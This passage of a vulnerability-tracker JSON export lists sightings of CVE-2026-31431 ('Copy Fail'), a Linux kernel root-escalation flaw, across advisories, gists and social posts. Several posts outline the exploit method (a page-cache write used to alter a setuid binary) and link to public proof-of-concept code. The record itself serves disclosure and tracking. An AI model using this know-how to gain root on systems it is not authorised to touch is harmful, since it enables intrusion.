"https://www.theregister.com/2026/04/30/linux_cryptographic_code_flaw/", "content": "", "creation_timestamp": "2026-04-30T05:28:35.783179Z"}, {"uuid": "58884637-a899-4fba-bf7e-daf86385e130", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/wangjiezhe/0f0617910e7775254fc582a4594c5e90", "content": "", "creation_timestamp": "2026-04-30T15:03:14.000000Z"}, {"uuid": "39e1e651-ec04-40de-b024-89ba388377cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hackernewsbot.bsky.social/post/3mknqqm2i4u2s", "content": "Copy Fail \u2013 CVE-2026-31431 | Discussion", "creation_timestamp": "2026-04-29T18:40:06.449720Z"}, {"uuid": "75ffc174-b880-4439-9034-ee0d28af8839", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/c3iq.bsky.social/post/3mkp2hagybs2p", "content": "CVE-2026-31431.  This is not a drill.  copy.fail", "creation_timestamp": "2026-04-30T07:06:29.675242Z"}, {"uuid": "d97ff212-7873-4628-809d-25b46c8fab7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/mschmitt/d2b0a19034e3247428d5c31091ba7bef", "content": "", "creation_timestamp": "2026-04-30T07:09:23.000000Z"}, {"uuid": "bc39a19f-d94c-40f3-810e-f46c1baa6f7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/dramforever/b86d29576f69b16b05af45745574a273", "content": "", "creation_timestamp": "2026-04-30T07:14:36.000000Z"}, {"uuid": "eb55972a-0f30-4567-bc35-9cd257be46a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/GottZ/7cb012306afcb77f31b34fb62158d9c3", "content": "", "creation_timestamp": "2026-04-30T06:50:17.000000Z"}, {"uuid": "5a2386b5-d931-4010-be20-d6cc1a424e83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/sagalinked.bsky.social/post/3mknrmu76am2g", "content": "\ud83d\udcf0 Oh no! Another copy fail! The tech world is abuzz with the latest security flaw - CVE-2026-31431. It's like a digital version of \"The Great Gatsby\" - everyone wants to know if it's going to be a disaster or just another chapter in the story. Stay tuned ...\n\n\ud83d\udd17 https://copy.fail/\n\n#Tech #Dev", "creation_timestamp": "2026-04-29T18:55:54.291664Z"}, {"uuid": "c8c02532-4dbf-45a4-9d43-3a87fc826c8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/webcpu/7c928d4740d4b4330646df1041a5ee1e", "content": "", "creation_timestamp": "2026-04-30T08:15:26.000000Z"}, {"uuid": "852158f4-51c4-42d6-a20e-d68664fcd634", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/ncharles/3b258625474f123b8528a776941e8292", "content": "", "creation_timestamp": "2026-04-30T08:00:13.000000Z"}, {"uuid": "3bf8ba49-14ec-47f4-998c-039c09bc1fbb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ottijp.com/post/3mkpby7yr3s2t", "content": "CVE-2026-31431", "creation_timestamp": "2026-04-30T09:21:14.846984Z"}, {"uuid": "576f0ea3-349b-4db7-8980-8fc22482c81f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/alon710/03871871846b38f098edf226a0f312a4", "content": "", "creation_timestamp": "2026-04-30T09:30:28.000000Z"}, {"uuid": "c4840d66-c3cd-493c-aece-05102d6f4cd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://nsm.no/fagomrader/digital-sikkerhet/nasjonalt-cybersikkerhetssenter/varsler-fra-nsm/alvorlig-sarbarhet-i-linux-kjernen", "content": "", "creation_timestamp": "2026-04-30T01:35:52.000000Z"}, {"uuid": "4b835726-6fb5-4c99-a76a-756546058f7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/kravietz.agora.echelon.pl.ap.brid.gy/post/3mknrnt5npao2", "content": "A nice new #Linux kernel exploit aka CopyFail CVE-2026-31431\n\nhttps://copy.fail/\n\n#infosec", "creation_timestamp": "2026-04-29T18:56:29.902610Z"}, {"uuid": "ddcde28a-1df0-4d5b-8258-e94096dbcba4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/idrassi/8dca804c4ea4268719cb0e8f50638e11", "content": "", "creation_timestamp": "2026-04-30T08:26:25.000000Z"}, {"uuid": "1808df77-623f-4ff0-8541-0a8914f8e3b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/betterhn20.e-work.xyz/post/3mknrdcx42g2o", "content": "Copy Fail \u2013 CVE-2026-31431 https://copy.fail/ (https://news.ycombinator.com/item?id=47952181)", "creation_timestamp": "2026-04-29T18:50:34.604672Z"}, {"uuid": "a7862b14-fa26-4ce2-b659-3c6541c8bc38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://thehackernews.com/2026/04/new-linux-copy-fail-vulnerability.html", "content": "", "creation_timestamp": "2026-04-30T07:24:00.000000Z"}, {"uuid": "4ea1ba88-7e24-4c0e-8efa-9748a97f3996", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hackernewstop5.bsky.social/post/3mkns2hhn432b", "content": "Copy Fail \u2013 CVE-2026-31431\n\n#HackerNews\n\nhttps://copy.fail/", "creation_timestamp": "2026-04-29T19:03:30.741416Z"}, {"uuid": "afcb455e-30a4-4b10-9f95-73d27acc2340", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://cert.europa.eu/publications/security-advisories/2026-005/", "content": "", "creation_timestamp": "2026-04-30T07:25:30.000000Z"}, {"uuid": "970d7846-a00c-49d9-99c5-0e4139a05fae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pavel.social.kernel.org.ap.brid.gy/post/3mkq2yq3symd2", "content": "CVE-2026-31431", "creation_timestamp": "2026-04-30T16:49:45.470865Z"}, {"uuid": "fff8b7b1-d16a-425f-9d4c-940084e826a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://www.cert.at/de/warnungen/2026/4/copy-fail-kritische-linux-kernel-schwachstelle-ermoglicht-lokale-root-rechte", "content": "", "creation_timestamp": "2026-04-30T07:12:27.000000Z"}, {"uuid": "08e98e47-c5f7-4d7c-8fd2-ea291303ecf5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/gormih/faa271309205184d220f2eeb6ac8fb4e", "content": "", "creation_timestamp": "2026-04-30T10:37:23.000000Z"}, {"uuid": "4b50b26c-efe9-4284-b49e-28fbe19ed2cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/bram/9b48732e03d15257f31134caea8600f2", "content": "", "creation_timestamp": "2026-04-30T10:01:41.000000Z"}, {"uuid": "3b2d6750-c3f2-43b5-a8e0-d3bd636dd29d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/reduanmasud/e4e2f5d0e7bc58d162ee306d58afe2c0", "content": "", "creation_timestamp": "2026-04-30T17:13:48.000000Z"}, {"uuid": "f9290da6-45c3-4c1c-bc1b-f378c5105d44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/tildes.bsky.social/post/3mkpeu57l3q2w", "content": "Linux priveledge escalation (CVE-2026-31431) (@copy.fail)\n\nMain Link | Discussion", "creation_timestamp": "2026-04-30T10:12:39.572481Z"}, {"uuid": "98a17e57-8a4e-4027-9432-5e063a6b3f51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/betterhn50.e-work.xyz/post/3mknsouqjld2g", "content": "Copy Fail \u2013 CVE-2026-31431 https://copy.fail/ (https://news.ycombinator.com/item?id=47952181)", "creation_timestamp": "2026-04-29T19:14:55.776642Z"}, {"uuid": "e727d523-66fc-4e21-8b36-8c1cd2174625", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/agentwyre.ai/post/3mknsdz5qn22u", "content": "\ud83d\udd34 Copy Fail (CVE-2026-31431) gives unprivileged users a reliable Linux root path across mainstream distros\n\nCopy Fail, tracked as CVE-2026-31431, is a newly disclosed local privilege escalation bug in Linux that researchers say can reliably turn an unprivileged...\n\nhttps://copy.fail/\n\n#AI #AgentWyre", "creation_timestamp": "2026-04-29T19:08:50.870269Z"}, {"uuid": "3b49af04-0b18-4ee6-9646-4fb358f5df2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hn100.atproto.rocks/post/3mknspk4xq72s", "content": "Copy Fail \u2013 CVE-2026-31431\nhttps://copy.fail/\n\nhttps://news.ycombinator.com/item?id=47952181", "creation_timestamp": "2026-04-29T19:15:17.974203Z"}, {"uuid": "7c6c2607-cc0a-46f8-b9ab-02a83048f8aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/giggls.bsky.geggus.net/post/3mknstexztiu2", "content": "Hm https://security-tracker.debian.org/tracker/CVE-2026-31431", "creation_timestamp": "2026-04-29T19:17:30.609877Z"}, {"uuid": "1117f125-651a-42a2-b85c-78c2b8fb7514", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/_8DZ7q8HXGubn2asS1SNYbdiSRV4J0KvfO1R9whXYUDjGA", "content": "", "creation_timestamp": "2026-04-30T18:41:24.000000Z"}, {"uuid": "93d427a1-5a80-42cf-b7d5-6a82d8cafdec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/XJFCu5UGSlf8LdrBjxjYOz5idEEI2EMesOUI85-NmJpK1tU", "content": "", "creation_timestamp": "2026-04-30T03:00:10.000000Z"}, {"uuid": "4bc882f1-9bb7-433b-8841-e96ca732f841", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/g0xa52a2a.bsky.social/post/3mkntolp2u22w", "content": "CVE-2026-31431 is going to be one for the history books \ud83d\ude43\n\ncopy.fail", "creation_timestamp": "2026-04-29T19:32:42.539551Z"}, {"uuid": "6a70f530-0cf8-4bf5-87e7-a4797e45ea83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosecbot.bsky.social/post/3mknthngxik26", "content": "Time to talk about this one.\n\nCopyFail (CVE-2026-31431) \u2014 a 732-byte Python script that roots every Linux distro shipped since 2017.\n\n\ud83d\udd01 RT @brian_pak | reposted by @hasherezade\nhttps://x.com/brian_pak/status/2049533584097362272", "creation_timestamp": "2026-04-29T19:28:46.262945Z"}, {"uuid": "c4093d42-ed7c-43a2-929c-3c1fbcf3eece", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hn-frontpage-bot.bsky.social/post/3mknu3a45lo2n", "content": "A critical Linux vulnerability, \"Copy Fail\" (CVE-2026-31431), allows unprivileged local users to gain root access. Affecting all Linux distros since 2017, it's a 100% reliable logic flaw, not a race condition, and can lead to container escapes.", "creation_timestamp": "2026-04-29T19:39:43.956707Z"}, {"uuid": "caf9ecbf-6a7d-49e9-818f-c4888139a9d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/newsycombinatorbot.bsky.social/post/3mkntx2xszb2r", "content": "Copy Fail \u2013 CVE-2026-31431 (copy.fail)\n\nDiscussion | Main Link", "creation_timestamp": "2026-04-29T19:37:23.650885Z"}, {"uuid": "dfeda009-4b03-4324-9324-de388a79700e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://mstdn.social/users/jschauma/statuses/116489699707306146", "content": "Ooooh, nice:\nhttps://xint.io/blog/copy-fail-linux-distributions\nCVE-2026-31431: Local privilege escalation to root using a trivial 732 byte python script for pretty much every Linux distribution since 2017.\n#CopyFail", "creation_timestamp": "2026-04-29T19:42:37.387249Z"}, {"uuid": "709c1b74-7dc7-4c87-a280-905467cfbe22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/jschauma.mstdn.social.ap.brid.gy/post/3mknuakdijtq2", "content": "Ooooh, nice:\n\nhttps://xint.io/blog/copy-fail-linux-distributions\n\nCVE-2026-31431: Local privilege escalation to root using a trivial 732 byte python script for pretty much every Linux distribution since 2017.\n\n#CopyFail", "creation_timestamp": "2026-04-29T19:42:45.645246Z"}, {"uuid": "34a22a4e-6b27-4b2b-9536-a4dfcebf0e48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/FLV6t7Va3c__w7z9N_mSu7nucQbg4vUfz1QpezNhFqmT_OM", "content": "", "creation_timestamp": "2026-05-02T21:00:04.000000Z"}, {"uuid": "f2508d8f-9fb3-46f1-a135-8b3212987bd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hackernewsrobot.bsky.social/post/3mknupcyraq2c", "content": "Copy Fail \u2013 CVE-2026-31431", "creation_timestamp": "2026-04-29T19:50:57.810485Z"}, {"uuid": "15d89919-b6c8-4072-ab16-ce558b3f38ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/fragmede/4fb38fb822359b8f5914127c2fe1c94f", "content": "", "creation_timestamp": "2026-04-29T20:24:46.000000Z"}, {"uuid": "b872623f-f84d-4be1-8589-c6cb21bbbc20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/newsyc200.bsky.social/post/3mknwjhmpnz2m", "content": "Copy Fail \u2013 CVE-2026-31431 https://copy.fail/ (http://news.ycombinator.com/item?id=47952181)", "creation_timestamp": "2026-04-29T20:23:28.594842Z"}, {"uuid": "f175f877-00d4-4670-b9fc-2e8f6c95423d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/jeht1hlPckgqiNrYmKXPjtYBl6Ckbf5A93GyXLRwxjRq970", "content": "", "creation_timestamp": "2026-05-03T09:00:04.000000Z"}, {"uuid": "be0d0c87-ae23-44cb-baef-459249ef8970", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/linux-kernel-elevation-of-privilege-vulnerability_20260504", "content": "", "creation_timestamp": "2026-05-03T18:45:00.000000Z"}, {"uuid": "6496ada0-1f11-4e01-aa84-20ed8fb71f23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/cYbomHaTGTLOs95SVGZEas4XOSbbs1P0dkn6F8I8p6igQwc", "content": "", "creation_timestamp": "2026-05-02T15:00:06.000000Z"}, {"uuid": "802becb1-9d54-45d3-9e9e-a224266c3eec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/3a2jD3gjNHncLnKc8fyr9DC3SGOgXMvvZ9Cx1ndl6893LxY", "content": "", "creation_timestamp": "2026-05-02T09:00:04.000000Z"}, {"uuid": "94932710-1e7e-40a5-ba6b-b3ee9d40f7fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/fussycoder.bsky.social/post/3mkny2aetks2g", "content": "Welp, CVE-2026-31431  is exciting... \ud83d\udc40\ud83d\ude31", "creation_timestamp": "2026-04-29T20:50:44.587316Z"}, {"uuid": "25238001-d1d6-4f6a-ab2b-29dd1a7918a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/MurpDVre-4LCYzH5BvUtvVRvpJ9yqT35RKsHtthqDCH1oSA", "content": "", "creation_timestamp": "2026-05-03T03:00:05.000000Z"}, {"uuid": "1320ed87-aaba-4415-ac0e-b3f7bb2f3fa9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/lalgorisme.bsky.social/post/3mknxngmmqk2z", "content": "La IA ha ajudat a descobrir una nova vulnerabilitat cr\u00edtica a Linux: CVE-2026-31431 \u201cCopy Fail\u201d\nUn \u00fanic script Python de 732 l\u00ednies permet a qualsevol usuari local obtenir acc\u00e9s root en pr\u00e0cticament tots els sistemes Linux des de 2017.\n\ncopy.fail", "creation_timestamp": "2026-04-29T20:43:39.336097Z"}, {"uuid": "63c10239-afc1-4910-87c4-0826a30042b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mknxobha532x", "content": "CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-04-29T20:44:06.150772Z"}, {"uuid": "b979ab0d-268b-4c1f-bdfe-1b437f4c509a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/P0x3k_1N73LL1G3NC3/339", "content": "Copy Fail\u2014 Linux LPE (CVE-2026-31431)\n\nA logic bug in the Linux kernel's authencesncryptographic template. It lets an unprivileged local user trigger a deterministic, controlled 4-byte write into the page cache of any readable file on the system. A single 732-byte Python script can edit a setuid binary and obtain root on essentially all Linux distributions shipped since 2017.\n\nExploit: https://github.com/theori-io/copy-fail-CVE-2026-31431\n\nA 732-byte PoC gets root on Ubuntu, Amazon Linux, RHEL, SUSE.", "creation_timestamp": "2026-04-29T19:58:35.000000Z"}, {"uuid": "558edd6d-5e33-4142-a144-da4398164d8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/newsyc250.bsky.social/post/3mknyr5hmok2a", "content": "Copy Fail \u2013 CVE-2026-31431 https://copy.fail/ (http://news.ycombinator.com/item?id=47952181)", "creation_timestamp": "2026-04-29T21:03:33.751818Z"}, {"uuid": "925b5176-fe0d-47db-8036-35b48b4cbb75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/m1ddl3w4r3/cdf95ac103d819eab7100f6b3d7c7f2f", "content": "", "creation_timestamp": "2026-04-29T21:01:14.000000Z"}, {"uuid": "396e0df9-407f-438f-9320-9df1c2c75239", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mknyu5g6kzo2", "content": "Copy Fail (CVE-2026-31431) is a trivially exploitable logic bug in Linux, reachable on all major distros released in the last 9 years. A small, portable python script gets root on all platforms. ht...\n\n#r/sysadmin\n\nOrigin | Interest | Match", "creation_timestamp": "2026-04-29T21:05:18.702703Z"}, {"uuid": "381f58ba-cccf-4e52-8ea9-020e6dfddff1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/P0x3k_1N73LL1G3NC3/342", "content": "CopyFail-go\n\nCopyFail (CVE-2026-31431) in Go. In case you want to get root from a static binary without Python as a dependency.", "creation_timestamp": "2026-04-30T18:38:25.000000Z"}, {"uuid": "d581d4e3-958e-4297-b219-55d7b443b8a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/tgies/e6db71355e3a930dd72c4e0f25f4dd26", "content": "", "creation_timestamp": "2026-04-29T21:13:56.000000Z"}, {"uuid": "a2ab5bc1-07b9-45ed-bc61-de8ea19e2add", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mkzyhwb6zh27", "content": "\ud83d\udd17 CVE : CVE-2026-31431, CVE-2026-341431", "creation_timestamp": "2026-05-04T15:30:21.683811Z"}, {"uuid": "65ac8204-7f5a-4ce8-9f5d-4967a1029e87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3ml2d44phkd2e", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-05-04T18:40:36.395086Z"}, {"uuid": "83b07711-6482-47aa-8c7c-7b07b2650a12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/valere.hostux.social.ap.brid.gy/post/3mkrginetjbl2", "content": "https://security-tracker.debian.org/tracker/CVE-2026-31431\n\nPatched kernel for Debian 13 Trixie\n\n#CopyFAil", "creation_timestamp": "2026-05-01T05:47:25.411150Z"}, {"uuid": "0fe4ee51-5305-4026-bf5e-a3ed46a3f361", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3ml2au4kdt52u", "content": "Re: Precise disclosure contents for copyfail (Re: [oss-security] CVE-2026-31431: CopyFail: linux local privilege scalation)", "creation_timestamp": "2026-05-04T18:00:20.516442Z"}, {"uuid": "40158c23-2cab-42ea-8f4a-8d36ec4d33ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mkodegfob7j2", "content": "Copy Fail (CVE-2026-31431) is a trivially exploitable logic bug in Linux, reachable on all major distros released in the last 9 years. A small, portable python script gets root on all platforms. ht...\n\n#r/sysadmin\n\nOrigin | Interest | Match", "creation_timestamp": "2026-04-30T00:13:26.689117Z"}, {"uuid": "bae00dc9-2593-40cc-ab6f-065aba4e13ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosecbriefly.bsky.social/post/3mkoegipxbo2x", "content": "Major Linux distributions are patching a local privilege escalation vulnerability known as Copy Fail (CVE-2026-31431) due to a logic flaw in the kernel.\n", "creation_timestamp": "2026-04-30T00:32:22.453832Z"}, {"uuid": "0ec1511f-59a0-474d-b1ed-68632be8706f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/what.tf/post/3mko32tio7c2m", "content": "\ud83d\udea8 CVE-2026-31431 (Copy Fail)\nGo patch all your Linux distros ASAP.\n\nTL; DR: Easy and portable Linux privilege escalation, a local user is able to become root with very little 